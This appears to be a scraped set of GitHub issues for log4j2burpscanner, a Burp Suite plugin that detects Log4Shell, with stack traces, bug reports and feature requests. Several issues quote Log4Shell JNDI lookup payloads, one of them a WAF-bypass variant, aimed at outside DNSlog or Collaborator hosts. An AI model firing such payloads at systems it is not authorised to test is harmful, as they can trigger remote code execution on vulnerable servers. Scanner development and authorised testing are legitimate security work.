at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
大佬可否出个白名单功能啊,现在只要一开启插件就什么网站都打
没有回复信息
加载成功了,但是没任何相应
可以增加一个随机的字符串标记吗?
我发现有些网站请求地址太长而导致都是一样的 没法定位到某个具体参数,可不可以增加一个随机的字符串标记以便定位
请把dnslog平台加白
目前收到很多来自你插件的无意义被动扫描,请把 咕.com (xn--9tr.com) 全局加白。感谢。
Hi
First of all thanks for this tool. Everything works perfectly. Except one very important thing. It doesn't report the vulnerable parameters. Do you think you can implement this?
Cheers
cant load extension
java.lang.ClassNotFoundException: burp.BurpExtender
at java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:476)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:589)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
at java.base/java.lang.Class.forName0(Native Method)
at java.base/java.lang.Class.forName(Class.java:398)
at burp.b0r.a(Unknown Source)
at burp.b0r.(Unknown Source)
at burp.c73.a(Unknown Source)
at burp.igl.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:829)
内网dnslog平台要怎么配置?
比如我本地开启了xray的反连,我应该怎么配置响应url那里?
添加自定义poc扫描
如添加自定义bypass payload扫描,如:
%24%7Bjndi:ldap://%24%7BhostName%7DXXXX%24%7B::-.%http://upnnhdrm4xboo3bhucusb6x64xanyc.burpcollaborator.net%7Dzzzz
新版本dnslog配置问题
0.15 burp第一次加载后dnslog部分dnsldaprmi=dns出现了两次,应该是写重了吧。小问题删掉一个保存就行,就是不知道并存的话优先级最高的是哪个 哈哈
Not a Bug, just a questions
Hi again
What is the difference between log4j2burpscanner-0.18.3-jdk11.jar and log4j2burpscanner-0.18.3-jdk8.jar
What version is better for Mac if my java version in use is "15.0.1" ?
is it possible instead of ceyedns to make it works with burp collaborator?
Thanks
大佬可否出个白名单功能啊,现在只要一开启插件就什么网站都打
Mac error
Hi, Any idea why I'm getting these errors? I use the latest version of your extension
Macbook
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
JDK (build 1.8.0_321-b07)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.ei4 @7034e82d)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.ei4 @7034e82d)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1467)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1467)
at burp.dbq.run(Unknown Source)
at burp.dbq.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)
at java.base/java.lang.Thread.run(Thread.java:831)
Thanks
手动查看dnslog平台有记录,控制台errors报错,获取不到数据
java.lang.NullPointerException: Cannot invoke "okhttp3.Response.body()" because "response2" is null
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1799)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)
17.4 还是$被url编码,再post包中无法解析
例如:
{
user:"sjjsjssjjs${jndi:ldap://1111111}" #这个可以解析
user:"sjjsjssjjs%24{jndi:ldap://1111111}" #这个就无法解析
}
现在这个版本$虽然编码了,burp上显示有漏洞,但是再dnslog上是没记录的,不知道啥原因。(网站本身有漏洞)
现在这个版本没有再重放一遍为编码的poc这一步了,不知道是不是去掉了。
之前的版本是不编码再重放一遍,可以增加一个选项是否编码$
关于数据包中多个参数同时被替换
插件目前应该是一次性替换所有请求吧?的确可以减少发包的数量。
结果遇到个问题,漏洞点在waf上,但是一个包中所有参数同时被替换结果触发不了,只有当单独某一个参数为payload才能触发。
还有就是,当勾选header其他参数测试时,原数据包本来不存在的参数被添加,造成请求异常等等
关于优化建议
1.payload的请求设定建议在每个payload上加入数字顺序。意思就是比如包里有5处可以插件自动化输入payload的地方,那么5个参数的payload可以是test1.XXX.ceye.io依次到test5.XXX.ceye.io的方式。这样在查看ceye.io log的时候就知道是哪个payload触发了漏洞方便定位数据包中的漏洞点。
2.能否增加一个内网检测的参数进行切换可以修改自定义的请求rmi和ldap的地址,用于快速检测内网不出网资产的漏洞验证。利用插件帮忙自动化输入到参数进行测试可以节省很多时间。
这几天漏洞爆发很多业主单位都要求排查漏洞所以这个需求还是很关键的。
额外的触发点
包头里各种 Content-Type、Referer、Accept-Language、Accept、Accept-Encoding等都有可能成为触发点,望加入检测范围,感谢。
内存泄漏问题
log4j2burpscanner v0.18.6
win10x64 java version 11
burpsuite v2021.8
长时间开启插件后burpsuite 内存会一直增加
0.18.4版本被动扫描有点问题
环境是jdk11+bp(2021.5.1版本)
问题一:被动扫描打开后,没看到发送检测的语句。
问题二:使用主动检测时,ceye检测时,ceye后台已经看到请求的数据,证明存在漏洞,但是插件未显示。
payload的test前面有一个空格,导致无法检测漏洞
通过logger++观察到 payload 是 %24{jndi:dns://xxxxxx.ceye.io/%20test} 这种形式,在网站上测试漏洞,我把%20去掉,会有回显,加上%20无回显。
%20是本身的设计?
custom header lists请求异常
custom header lists置空,依然会有jndi payload出现在请求报文里,导致请求异常
大佬 请教下有办法取消默认的url吗?还有为啥payload会多个冒号呢?
这是生成的payload %24{jndi:rmi:://ip:port/%20test}
插件不起作用、插件右键无效统一issue
原因在于jdk版本,作者的jdk版本为1.8_231、1.8_151,测试都是正常的,请不要再提交类似issue,jdk版本太多,无法做到全版本兼容,请谅解
UI问题
师傅,我这每次打开burp都是这样的
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.